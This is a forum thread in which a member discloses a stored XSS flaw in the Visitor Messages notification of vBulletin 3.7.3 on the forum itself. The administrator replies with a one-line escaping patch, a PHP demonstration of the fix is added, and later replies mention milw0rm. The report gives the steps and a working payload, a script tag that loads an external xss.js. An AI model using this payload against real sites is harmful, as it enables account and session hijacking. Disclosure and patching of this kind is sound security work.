NOTICE
THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME. @ admin (shabbir) Please don't ban me for this. Because I have not used this hack for any illegal / harmful purposes. (You can check all records). I have just tested an exploit and found it positive. Please fix it soon. I write this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage. Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.

Action
First, we must check the version of vBulletin used by G4EF:
(1) Open any page such as your user control panel.
(2) View the page source.
(3) You discover this:
Code:
<style type="text/css" id="vbulletin_css">
/**
 * vBulletin 3.7.3 CSS
 * Style: 'Default Style'; Style ID: 1
 */
@import url("clientscript/vbulletin_css/style-eb31dabe-00001.css");
</style>
(4) Perfect! G4EF is not upgraded to the latest 3.8.x vBulletin. So, we can hack it.

The vulnerability:
When vBulletin is used with the "Visitor Messages" add-on, we can easily execute external code by the XSS vulnerability that exists. When the XSS script is posted as a visitor message, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee (the one who receives). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered XSS attack!

How I tested it:
(1) I opened a duplicate account: _H4X0R_, which I request shabbir to kindly delete now.
(2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
(3) I logged out.
(4) I logged in as _H4X0R_.
(5) Opened my user control panel: usercp.php.
(6) Whoa!! XSS successful!

Conclusion
Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.
I think I deserve some good reputation points and/or some rewards for this ! Sorry shabbir, for using duplicate account but you may delete it now. You should also understand that this was important for the security of the forum and so please don't ban me :p
Thanks for reporting Saswat. Upgrading to 3.7.6 is the preferred solution, which we would also be doing, but here is the quick fix. Using vBulletin 3.7.3 and having all the functionality and plugins tested, I preferred not to upgrade immediately (though I have the upgrade option), and here is the patch for this vulnerability.

Open the usercp.php file. Go to line number 250. Find the following code:
Code:
$visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)));
Replace with:
Code:
$visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))));
And that should be fine for this problem. vBulletin also recommends upgrading to the latest version, which has all the fixes.
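To make the effect of that one-line patch visible, here is an added PHP illustration (not code from this thread or from vBulletin). It rebuilds the shape of the summary pipeline with small stand-in helpers and renders the notification fragment both without and with the escaping wrapper. The `_demo` helper names, the BBCode regex, the constructed message and the assumption that `htmlspecialchars_uni()` behaves like `htmlspecialchars()` in UTF-8 mode are all mine; the real vBulletin helpers also censor words and word-wrap, which is omitted here.

```php
<?php
// Added example, not vBulletin code. Demonstrates why the usercp.php summary
// needs HTML escaping before it is placed in the notification template.

// Stand-in for vBulletin's htmlspecialchars_uni(); assumed to behave like
// htmlspecialchars() with UTF-8 and quote escaping.
function htmlspecialchars_uni_demo($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Stand-in for strip_bbcode(): removes [tag], [/tag] and [tag=value] markers.
// Note that it deliberately knows nothing about HTML, just like the original
// pipeline, so raw <script> tags pass straight through.
function strip_bbcode_demo($text) {
    return preg_replace('/\[\/?[a-z*]+(?:=[^\]]*)?\]/i', '', $text);
}

// Stand-in for fetch_trimmed_title(): cuts the summary to $len characters
// (byte-based here for simplicity; the real one is multibyte-aware).
function fetch_trimmed_title_demo($text, $len) {
    return strlen($text) > $len ? substr($text, 0, $len - 3) . '...' : $text;
}

// Before the patch: the summary is concatenated into the HTML unescaped.
function render_summary_vulnerable($pagetext) {
    $summary = fetch_trimmed_title_demo(strip_bbcode_demo($pagetext), 50);
    return '<div class="vm-summary">' . $summary . '</div>';
}

// After the patch: the same pipeline, with escaping as the outermost call,
// mirroring the htmlspecialchars_uni(...) wrapper from the fix above.
function render_summary_patched($pagetext) {
    $summary = htmlspecialchars_uni_demo(
        fetch_trimmed_title_demo(strip_bbcode_demo($pagetext), 50)
    );
    return '<div class="vm-summary">' . $summary . '</div>';
}

// Constructed sample visitor message containing BBCode plus a script tag,
// the kind of input the thread describes.
$message = '[b]hi[/b] <script>alert(1)</script>';

echo "Vulnerable: " . render_summary_vulnerable($message) . "\n";
echo "Patched:    " . render_summary_patched($message) . "\n";
```

Run it with `php` from the command line and compare the two lines: in the vulnerable output the `<script>` element survives as live markup, in the patched output it arrives at the browser as `&lt;script&gt;...` text. Escaping is applied as the last step, after trimming, so the length cut can never split an entity such as `&amp;` in half; that is also why the thread's patch wraps the whole expression rather than escaping `pagetext` first.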
Nice find. I really like XSS vulnerabilities. Not 100% sure, but I think it's already reported to miliw0rm a couple of months back.
Check out miliw0rm.com; all the vulnerabilities which are found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role in helping the developers of different CMSes to release a new version of their software after fixing the vulnerabilities.
Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com. Lots of vulnerabilities and an MD5 cracker too: perfect package for hackers.
Yes, it was found on many other websites as well, but no one had the patch unless you upgrade the complete code, and so here I provided the patch as well. Enjoy